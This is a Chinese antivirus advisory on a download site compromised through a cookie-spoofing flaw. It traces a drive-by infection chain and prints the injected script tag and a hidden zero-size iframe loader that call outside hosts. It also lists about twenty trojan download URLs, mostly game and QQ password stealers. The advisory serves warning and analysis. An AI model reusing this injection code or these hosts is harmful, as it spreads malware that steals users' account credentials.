注册
登录
| 关键词: 病毒 木马 http OnLineGames Trojan www exe ehe nbsp Win |
近日安天实验室反病毒监测网发现,绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒,利用了Cookies 欺骗漏洞挂马,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。 该网站的主页里被插入如下框架: 代码: <script language="JavaScript" src="http://ad.goosms.cn/adv/onegreen.asp ?cid157&a=&b=&c=&d=&e=&f=" type="text/javascript" id="onegreen"></script> http://ad.goosms.cn/adv/onegreen.asp? cid157&a=&b=&c=&d=&e=&f= 得到代码如下: 从代码分析并未分析出可疑的地方,对其抓包分析发现利用了Cookies欺骗漏洞挂马。 抓包结果如图: 从抓包来看出其利用的Cookies 欺骗挂马方式。[next] SenFe uu56 www.onegreen.net 1600 950206336 29906134 247222832 29905933 * function SenFe() { .var c = getCookie("SenFe"); .if (c != null) { return; } .register("uu56"); .document.write("<iframe height=0 width=0 src=' http://count.51yse.com/pic/count1.htm'></iframe>") SenFe 打开:http://count.51yse.com/pic/count1.htm http://count.51***.com/pic/count1.htm 代码如下: 加密框架调用代码其分别调用以下地址: http://count.51***.com/pic/left.webp 连接 http://www.ehe****.cn/aa.exe下载木马 http://count.51***.com/pic/logo.webp http://count.51***.com/pic/head.webp http://count.51***.com/pic/left.webp 得到结果如下: 加密网马。 http://count.51***.com/pic/logo.gif网马代码如下: http://count.51***.com/pic/head.gif得到代码如下: [next] 当用户访问http://www.onegreen.net/index.asp时, 系统会自动隐藏下载以下病毒文件: http://www.ehe****.cn/aa.exe 病毒名:(Trojan-Downloader.Win32.Delf.aze) 下载者木马 一旦运行该木马将下载以下病毒到用户的系统,并运行。 http://www.ehe****.cn/aa/1.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.njs) 游戏盗号木马 http://www.ehe****.cn/aa/2.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nhs) 游戏盗号木马 http://www.ehe****.cn/aa/3.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nml) 盗号木马 http://www.ehe****.cn/aa/4.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.niy) 盗号木马 http://www.ehe****.cn/aa/5.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nkn) 游戏盗号木马 http://www.ehe****.cn/aa/6.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.ncu) 游戏盗号木马 http://www.ehe****.cn/aa/7.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nim) 盗号木马 http://www.ehe****.cn/aa/8.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nga) 盗号木马 http://www.ehe****.cn/aa/9.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nkh) 游戏木马 http://www.ehe****.cn/aa/10.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.njv) 游戏木马 http://www.ehe****.cn/aa/11.exe 病毒名:( ) 地址失效 http://www.ehe****.cn/aa/12.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nio) 游戏盗号木马 http://www.ehe****.cn/aa/13.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nil) 游戏盗号木马 http://www.ehe****.cn/aa/14.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nii) 游戏盗号木马 http://www.ehe****.cn/aa/15.exe 病毒名:(Trojan-PSW.Win32.WOW.aio) 游戏木马 http://www.ehe****.cn/aa/16.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nmc) 游戏盗号木马 http://www.ehe****.cn/aa/17.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.nez) 游戏木马 http://www.ehe****.cn/aa/18.exe 病毒名:(Virus.Win32.AutoRun.aq) AutoRun变种木马 http://www.ehe****.cn/aa/19.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.ned) 游戏木马 http://www.ehe****.cn/aa/20.exe 病毒名:(Trojan-PSW.Win32.QQPass.amy) QQ盗号木马 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
